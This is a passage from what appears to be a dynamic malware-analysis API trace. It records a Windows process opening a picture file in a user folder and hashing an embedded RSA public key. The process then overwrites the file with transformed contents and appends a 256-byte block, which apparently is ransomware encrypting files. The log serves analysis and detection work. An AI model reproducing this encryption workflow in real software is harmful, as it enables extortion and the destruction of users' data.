lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9977ad90, ftCreationTime.dwHighDateTime=0x1d896f9, ftLastAccessTime.dwLowDateTime=0xfd465b50, ftLastAccessTime.dwHighDateTime=0x1d8973f, ftLastWriteTime.dwLowDateTime=0xfd465b50, ftLastWriteTime.dwHighDateTime=0x1d8973f, nFileSizeHigh=0x0, nFileSizeLow=0x118b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BfwcyLh4.gif", cAlternateFileName="")) returned 1 [0193.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.544] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\BfwcyLh4.gif") returned=".gif" [0193.545] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\BfwcyLh4.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\bfwcylh4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.546] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=71861) returned 1 [0193.546] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.549] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1188f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.549] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.551] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.551] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x118b5, lpOverlapped=0x0) returned 1 [0193.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.553] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.554] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.554] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.554] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.554] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.554] GetLastError () returned 0x0 [0193.554] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.554] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.555] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.555] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.555] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x118c0) returned 0x2d49778 [0193.555] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42028 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42070 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.557] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ef8 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.560] GetCurrentThreadId () returned 0x264 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45ca0 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.561] GetCurrentThreadId () returned 0x264 [0193.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42070 | out: hHeap=0x6a0000) returned 1 [0193.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.574] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x118b0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x118b0, lpOverlapped=0x0) returned 1 [0193.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.575] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x118b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.575] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.576] RtlAllocateHeap (HeapHandle=0x6a0000, 